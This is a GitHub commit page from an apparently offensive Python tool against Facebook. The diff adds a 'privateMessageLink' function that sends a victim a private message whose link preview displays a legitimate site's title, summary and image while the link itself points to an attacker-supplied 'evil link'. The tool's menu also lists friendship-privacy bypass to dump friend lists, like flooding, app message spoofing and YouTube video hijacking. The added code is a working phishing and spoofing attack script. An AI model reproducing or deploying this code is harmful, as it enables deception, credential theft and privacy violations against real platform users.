Skip to content

Commit

Permalink
- Se agrega la funcionalidad de enviar un mensaje privado con un link…
Browse files Browse the repository at this point in the history 
… preview

- Siguen habiendo parametros hardcodeados, pero esto no afecta a la funcionalidad
  • Loading branch information
@chinoogawa
chinoogawa committed Dec 17, 2013
1 parent 3d08a25 commit 82e4f1e
Show file tree
Hide file tree
Showing 2 changed files with 146 additions and 29 deletions.
80 changes: 51 additions & 29 deletions main.py
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
from mainFunc import sendRequestToList,setGlobalLogginng ,reAnalyzeGraph,analyzeGraph,bypassFriendshipPrivacyPlot,massLogin,acceptRequest,friendshipRequest,like,appMessageSpoof,setMail,login,linkPreviewYoutube,linkPreview,hijackVideo, privateMessagePhishing, bypassFriendshipPrivacy, linkFriends, createUser, deleteUser,deleteAccounts
from mainFunc import privateMessageLink,sendRequestToList,setGlobalLogginng ,reAnalyzeGraph,analyzeGraph,bypassFriendshipPrivacyPlot,massLogin,acceptRequest,friendshipRequest,like,appMessageSpoof,setMail,login,linkPreviewYoutube,linkPreview,hijackVideo, privateMessagePhishing, bypassFriendshipPrivacy, linkFriends, createUser, deleteUser,deleteAccounts
from database import connect,status
from time import time
import signal
Expand Down Expand Up @@ -54,7 +54,7 @@ def main():
(int(option) != 15) and (int(option) != 16) and
(int(option) != 17) and (int(option) != 18) and
(int(option) != 19) and (int(option) != 20) and
(int(option) != 21)):
(int(option) != 21) and (int(option) != 22)):

print '\n'
print '1) Create accounts\n'
Expand All @@ -65,19 +65,20 @@ def main():
print '6) Link Preview hack (Simple web version)\n'
print '7) Link Preview hack (Youtube version)\n'
print '8) Youtube hijack\n'
print '9) Private message phishing/hijacking youtube video\n'
print '10) Like flood\n'
print '11) Publish a post as an App (App Message Spoof)\n'
print '12) Bypass friendship privacy\n'
print '13) Bypass friendship privacy with graph support\n'
print '14) Analyze an existing graph\n'
print '15) Link to disclosed friendships\n'
print '16) Print database status\n'
print '17) Increase logging level globally\n'
print '18) Set global login (Credentials stored in memory - Danger)\n'
print '19) Print dead attacks :\'( \n'
print '20) Send friend request to disclosed friend list from your account\n'
print '21) Close the application\n'
print '9) Private message, Link Preview hack (Simple web version)\n'
print '10) Private message, Link Preview hack (Youtube version)\n'
print '11) Like flood\n'
print '12) Publish a post as an App (App Message Spoof)\n'
print '13) Bypass friendship privacy\n'
print '14) Bypass friendship privacy with graph support\n'
print '15) Analyze an existing graph\n'
print '16) Link to disclosed friendships\n'
print '17) Print database status\n'
print '18) Increase logging level globally\n'
print '19) Set global login (Credentials stored in memory - Danger)\n'
print '20) Print dead attacks :\'( \n'
print '21) Send friend request to disclosed friend list from your account\n'
print '22) Close the application\n'

choice = raw_input('Insert your choice: ')

Expand Down Expand Up @@ -193,11 +194,30 @@ def main():
comment = raw_input('Insert a comment for the post associated to the video: ')
hijackedVideo = raw_input('Insert the ID for the hijacked video (watch?v=): ')
hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo)



if (int(option) == 9):
signal.signal(signal.SIGINT, signal_handler)

if (globalLogin == False):
email,password = setMail()
else:
email = globalEmail
password = globalPassword

if (login(email,password,'real'))!= -1:
victim = raw_input('Insert the victims user ID: ')
realLink = raw_input('Insert the real link: ')
title = raw_input('Insert a title for the link: ')
subject = raw_input('Insert the subject: ')
summary = raw_input('Insert a summary for the link: ')
message = raw_input('Insert the body of the message: ')
evilLink = raw_input('Insert the evil link: ')
imageLink = raw_input('Insert the image associated to the post: ')
privateMessageLink(message,victim,subject,realLink,title,summary,imageLink,evilLink)

if (int(option) == 10):
signal.signal(signal.SIGINT, signal_handler)

if (globalLogin == False):
email,password = setMail()
else:
Expand All @@ -217,7 +237,7 @@ def main():
privateMessagePhishing(victimId,message,subject,evilLink,videoLink,title,summary,videoID,hijackedVideo)


if (int(option) == 10):
if (int(option) == 11):
signal.signal(signal.SIGINT, signal_handler)
try:
counter = 0
Expand All @@ -243,7 +263,7 @@ def main():
raw_input('Press enter to continue..')


if (int(option) == 11):
if (int(option) == 12):

if (globalLogin == False):
email,password = setMail()
Expand All @@ -262,7 +282,7 @@ def main():
appMessageSpoof(appId,link,picture,title,domain,description,comment)


if (int(option) == 12):
if (int(option) == 13):
signal.signal(signal.SIGINT, signal_handler)

if (globalLogin == False):
Expand All @@ -277,7 +297,7 @@ def main():
print 'The information will be stored in dumps\\%s.txt \n' %victim
bypassFriendshipPrivacy(victim, transitive)

if (int(option) == 13):
if (int(option) == 14):
signal.signal(signal.SIGINT, signal_handler)

if (globalLogin == False):
Expand All @@ -293,27 +313,27 @@ def main():
bypassFriendshipPrivacyPlot(victim, transitive)


if (int(option) == 14):
if (int(option) == 15):
analize = int(raw_input('Analyze an existing one, or a new one? (0|1): '))
victim = raw_input('Insert the victim username or userId: ')
if (analize == 1):
analyzeGraph(victim)
else:
reAnalyzeGraph(victim)

if (int(option) == 15):
if (int(option) == 16):
fileName = raw_input('Insert the victim username: ')
linkFriends(fileName)

if (int(option) == 16):
if (int(option) == 17):
status()
raw_input('Press enter to continue: ')

if (int(option) == 17):
if (int(option) == 18):
print 'This will increase the execution time significantly'
setGlobalLogginng()

if (int(option) == 18):
if (int(option) == 19):

globalLogin = not globalLogin
if (globalLogin):
Expand All @@ -322,14 +342,14 @@ def main():
globalEmail = ''
globalPassword = ''

if (int(option) == 19):
if (int(option) == 20):
print 'Mail bomber through test accounts'
print 'Test accounts massive creation'
print 'Blocked Test account login bypass'
print 'We hope this tool to be useless in the future'
raw_input('Press enter to continue: ')

if (int(option) == 20):
if (int(option) == 21):
signal.signal(signal.SIGINT, signal_handler)
warning = True
while ( (warning is not '0') and (warning is not '1')):
Expand All @@ -349,7 +369,9 @@ def main():
if (login(email,password,'real'))!= -1:
sendRequestToList(victim)

if (int(option) == 21):


if (int(option) == 22):
connect.close()

print '\n \n \n \n \n \n\n \n \n \n \n \n\n \n \n \n \n \n\n \n \n \n \n \n\n \n \n \n '
Expand Down
95 changes: 95 additions & 0 deletions mainFunc.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -859,7 +859,102 @@ def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo):
# except:
# print 'Ctrl+c SIGNAL Caught\n'
# return


def privateMessageLink(message,victim,subject,realLink,title,summary,imageLink,evilLink):

c_user = getC_user()

try:
set_dtsg()
arguments = {
'w' : '398',
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][thread_id]' : '',
'message_batch[0][author]' : 'fbid:'+c_user,
'message_batch[0][author_email]' : '',
'message_batch[0][coordinates]' : '',
'message_batch[0][timestamp]' : '1387237764222',
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : '8:49pm',
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_cleared]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][is_spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : message,
'message_batch[0][has_attachment]' : 'true',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:' + victim,
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][content_attachment][subject]' : subject,
'message_batch[0][content_attachment][app_id]' : '2309869772',
'message_batch[0][content_attachment][attachment][params][urlInfo][canonical]' : realLink,
'message_batch[0][content_attachment][attachment][params][urlInfo][final]' : realLink,
'message_batch[0][content_attachment][attachment][params][urlInfo][user]' : evilLink,
'message_batch[0][content_attachment][attachment][params][favicon]' : 'http://www.whatever.com/favicon.ico',
'message_batch[0][content_attachment][attachment][params][title]' : title,
'message_batch[0][content_attachment][attachment][params][summary]' : summary,
'message_batch[0][content_attachment][attachment][params][images][0]' : imageLink,
'h' : '208',
'url' : imageLink,
'cfs' : '1',
'message_batch[0][content_attachment][attachment][params][medium]' : '106',
'message_batch[0][content_attachment][attachment][params][url]' : realLink,
'message_batch[0][content_attachment][attachment][type]' : '100',
'message_batch[0][content_attachment][link_metrics][source]' : 'ShareStageExternal',
'message_batch[0][content_attachment][link_metrics][domain]' : 'www.mkit.com.ar',
'message_batch[0][content_attachment][link_metrics][base_domain]' : 'mkit.com.ar',
'message_batch[0][content_attachment][link_metrics][title_len]' : '38',
'message_batch[0][content_attachment][link_metrics][summary_len]' : '180',
'message_batch[0][content_attachment][link_metrics][min_dimensions][0]' : '70',
'message_batch[0][content_attachment][link_metrics][min_dimensions][1]' : '70',
'message_batch[0][content_attachment][link_metrics][images_with_dimensions]' : '3',
'message_batch[0][content_attachment][link_metrics][images_pending]' : '0',
'message_batch[0][content_attachment][link_metrics][images_fetched]' : '0',
'message_batch[0][content_attachment][link_metrics][image_dimensions][0]' : '856',
'message_batch[0][content_attachment][link_metrics][image_dimensions][1]' : '566',
'message_batch[0][content_attachment][link_metrics][images_selected]' : '3',
'message_batch[0][content_attachment][link_metrics][images_considered]' : '5',
'message_batch[0][content_attachment][link_metrics][images_cap]' : '3',
'message_batch[0][content_attachment][link_metrics][images_type]' : 'ranked',
'message_batch[0][content_attachment][composer_metrics][best_image_w]' : '398',
'message_batch[0][content_attachment][composer_metrics][best_image_h]' : '208',
'message_batch[0][content_attachment][composer_metrics][image_selected]' : '0',
'message_batch[0][content_attachment][composer_metrics][images_provided]' : '3',
'message_batch[0][content_attachment][composer_metrics][images_loaded]' : '3',
'message_batch[0][content_attachment][composer_metrics][images_shown]' : '3',
'message_batch[0][content_attachment][composer_metrics][load_duration]' : '0',
'message_batch[0][content_attachment][composer_metrics][timed_out]' : '0',
'message_batch[0][content_attachment][composer_metrics][sort_order]' : '',
'message_batch[0][content_attachment][composer_metrics][selector_type]' : 'UIThumbPager_6',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1387237764222:[email protected]>',
'client' : 'mercury',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8a9EAMNpGvyVQ9UmWOGUGy6zECQqbx2mbAKGiCw',
'__req' : 'f',
'fb_dtsg' : br.form['fb_dtsg'],
'__rev' : '1048858',
'ttstamp' : '265816888106986872',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php ',datos)

if globalLogging:
logs(response.read())

except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Ctrl+c SIGNAL Caught\n'
return

def privateMessagePhishing(victimId,message,subject,evilLink,videoLink,title,summary,videoID,hijackedVideo):
c_user = getC_user()
Expand Down

0 comments on commit 82e4f1e

Please sign in to comment.